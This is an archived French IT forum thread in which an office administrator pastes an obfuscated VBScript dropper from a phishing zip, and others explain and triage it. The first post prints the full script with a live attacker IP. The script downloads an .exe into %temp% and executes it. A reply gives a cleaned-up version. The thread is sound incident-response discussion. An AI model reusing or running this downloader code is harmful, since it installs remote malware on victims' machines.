Posted January 28, 201510 yr Hello, Malgré notre firewall, antispam et antivirus, une collègue un reçu et lancé un script contenu dans une archive zip.Je vous copie/colle le contenue : Dim KDhnYBYFkCfnMjsyxDhPb KDhnYBYFkCfnMjsyxDhPb = "GYVknOOhGywVqmXmqbfPJwq"If KDhnYBYFkCfnMjsyxDhPb = "GYVknOOhGywVqmXmqbfPJwq" ThenEnd IfWScript.Sleep 4000Dim IDYVbPrSxIOQmVHlhhrMe IDYVbPrSxIOQmVHlhhrMe = "wxDxNGcmgbXsKhpRiATSSrY"If IDYVbPrSxIOQmVHlhhrMe = "wxDxNGcmgbXsKhpRiATSSrY" ThenEnd IfDim pWLDnIbAxcaFeCLyYVoMl pWLDnIbAxcaFeCLyYVoMl = "mfKUNJRzFLLpbeRwtxmrRgj"If pWLDnIbAxcaFeCLyYVoMl = "mfKUNJRzFLLpbeRwtxmrRgj" ThenEnd Ifpath = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%temp%")Dim jbOpkfGOcOSqeMWQsOtIV jbOpkfGOcOSqeMWQsOtIV = "vJieaxacOqWxnvUjZAkSeam"If jbOpkfGOcOSqeMWQsOtIV = "vJieaxacOqWxnvUjZAkSeam" ThenEnd Ifpath = path & "\"Dim bPKzPmlstEgupMlzTGcLE bPKzPmlstEgupMlzTGcLE = "gTnMSRmHhzWzyvuTlYyGNuM"If bPKzPmlstEgupMlzTGcLE = "gTnMSRmHhzWzyvuTlYyGNuM" ThenEnd IfURL = "http://192.99.19.178/xdde.exe"Dim UBuVzItKFfJxfYuSyMXRp UBuVzItKFfJxfYuSyMXRp = "ychzWoRwNLZXDHPuxyeoGnu"If UBuVzItKFfJxfYuSyMXRp = "ychzWoRwNLZXDHPuxyeoGnu" ThenEnd IfDJ = "foyoun.exe" Dim GiTlDQmIBtHlTvWlSngxD GiTlDQmIBtHlTvWlSngxD = "ldxtdRwqMOVkpklhgtRsxUB"If GiTlDQmIBtHlTvWlSngxD = "ldxtdRwqMOVkpklhgtRsxUB" ThenEnd Ifdim GH: Set GH = createobject("Microsoft.XMLHTTP")Dim oCvKtmDggbKnfwaqsfiHn oCvKtmDggbKnfwaqsfiHn = "kpcbBajIKTiwpyQfdihoxuz"If oCvKtmDggbKnfwaqsfiHn = "kpcbBajIKTiwpyQfdihoxuz" ThenEnd Ifdim NJ: Set NJ = createobject("Adodb.Stream")Dim XYYujdiLRWsDGyQrMdTdI XYYujdiLRWsDGyQrMdTdI = "vEbwhbOSeXaViUcyJSnrOGf"If XYYujdiLRWsDGyQrMdTdI = "vEbwhbOSeXaViUcyJSnrOGf" ThenEnd IfGH.Open "GET", URL, FalseDim noJDsEnwMRwvIuMKrDqsQ noJDsEnwMRwvIuMKrDqsQ = "FPQwfZtQpANBJFanZwjpGJJ"If noJDsEnwMRwvIuMKrDqsQ = "FPQwfZtQpANBJFanZwjpGJJ" ThenEnd IfGH.SendDim lJfIDLwdMkgxsqlxCSqdl lJfIDLwdMkgxsqlxCSqdl = "ABPauxKipqOKAcFvwbIyiIi"If lJfIDLwdMkgxsqlxCSqdl = "ABPauxKipqOKAcFvwbIyiIi" ThenEnd IfDim LvwsgIYDgarbKxryMxqEo LvwsgIYDgarbKxryMxqEo = "sMhQFNffWaUwwAAuOdvhCNJ"If LvwsgIYDgarbKxryMxqEo = "sMhQFNffWaUwwAAuOdvhCNJ" ThenEnd Ifwith NJDim sIEULnfeEkUwMezeyNsVj sIEULnfeEkUwMezeyNsVj = "WWDGYwhefowCeMvXsIZlqFt"If sIEULnfeEkUwMezeyNsVj = "WWDGYwhefowCeMvXsIZlqFt" ThenEnd If .type = 1 '//binaryDim EfbFlmGxEemgogWpEexDs EfbFlmGxEemgogWpEexDs = "HEpmlRhJSUTZxpeuDWcrSAl"If EfbFlmGxEemgogWpEexDs = "HEpmlRhJSUTZxpeuDWcrSAl" ThenEnd If .openDim bVARHccOjqvnFoOVovgLe bVARHccOjqvnFoOVovgLe = "wctpujUkjdZvWTsjKLKAEJj"If bVARHccOjqvnFoOVovgLe = "wctpujUkjdZvWTsjKLKAEJj" ThenEnd If .write GH.responseBodyDim ROuABfAUaQknyFlzXwkgu ROuABfAUaQknyFlzXwkgu = "IHiGcttPUBcEOtDtSwzwZtm"If ROuABfAUaQknyFlzXwkgu = "IHiGcttPUBcEOtDtSwzwZtm" ThenEnd If .savetofile path & DJ, 2 '//overwriteDim jBOqyenfPJuctlqaxUrJI jBOqyenfPJuctlqaxUrJI = "SHKundUfAztpwFSYZOYuQrq"If jBOqyenfPJuctlqaxUrJI = "SHKundUfAztpwFSYZOYuQrq" ThenEnd Ifend withDim zEzFClGHhilWxXYPejjuT zEzFClGHhilWxXYPejjuT = "EFeSoMpZcKBvaEActYROrRN"If zEzFClGHhilWxXYPejjuT = "EFeSoMpZcKBvaEActYROrRN" ThenEnd IfDim zUeKUpPqPdbZxcuJwtsvA zUeKUpPqPdbZxcuJwtsvA = "AmLzDptYwWTuKWLQGlsoWJL"If zUeKUpPqPdbZxcuJwtsvA = "AmLzDptYwWTuKWLQGlsoWJL" ThenEnd Iffile = path & DJDim WqltKUVZZcPQsSPXrAioP WqltKUVZZcPQsSPXrAioP = "QjJUHlosvNZZkQOVRLunbij"If WqltKUVZZcPQsSPXrAioP = "QjJUHlosvNZZkQOVRLunbij" ThenEnd IfSet WshShell = WScript.CreateObject("WScript.Shell")Dim srTHesvHyvDBrVUtHvBgL srTHesvHyvDBrVUtHvBgL = "RSiSxLCMbUbtNPgrrbnwZrQ"If srTHesvHyvDBrVUtHvBgL = "RSiSxLCMbUbtNPgrrbnwZrQ" ThenEnd IfWshShell.Run chr(34) & file & chr(34) Elle m'a dit avoir vu une fenêtre noir s'ouvrir et se fermer donc le code s'est bien exécuté. Je ne suis pas dév du tout mais j'ai l'impression qu'il doit essayer d'aller télécharger un .exe et le lancer. Je ne sais pas si cela a fonctionné.Auriez-vous des pistes d'où je peux chercher s'il y a un problème sur son poste ? Qui est malheureusement encore... en XP (j'avais prévu de lui changer la semaine prochaine en plus >_<).
January 29, 201510 yr Code simplifié : WScript.Sleep 4000 path = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%temp%") path = path & "\" URL = "http://xxx.xx.xx.xxx/xdde.exe" DJ = "foyoun.exe" dim GH: Set GH = createobject("Microsoft.XMLHTTP") dim NJ: Set NJ = createobject("Adodb.Stream") GH.Open "GET", URL, False GH.Send with NJ .type = 1 '//binary .open .write GH.responseBody .savetofile path & DJ, 2 '//overwrite end with file = path & DJ Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run chr(34) & file & chr(34) Donc oui il va chercher un fichier sur le net le télécharge dans le dossier temp et l'execute. Ta machine est vérolée. Edited January 29, 201510 yr by John Shaft EDIT de la balise URL qui contenait encore l'IP en clair
January 29, 201510 yr Author Merci. Le fichier foyoun.exe faisait 1ko donc je l'ai ouvert avec Notepad++ au cas où et il y avait ça dedans : <html><head><title> Hôte injoignable </title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> </head><body bgcolor="#E0E0FF"> <blockquote><h3>Le site que vous souhaitez interroger est actuellement indisponible. </h3></blockquote> </body> </html> Le site où il voulait récupérer le .exe vérolé est HS donc en fait ça va il ne s'est rien passé.
January 29, 201510 yr Méfie toi quand même, on ne sait jamais c'est ptet histoire de brouiller les pistes ! ^^
January 29, 201510 yr Author Je lui change son poste par un neuf demain J'en parlerai à mes collègues dév quand ils seront dispo quand même si jamais ça se reproduit, puis petite note d'info aux secrétaires de faire gaffe aux emails bizarres.
Archived
This topic is now archived and is closed to further replies.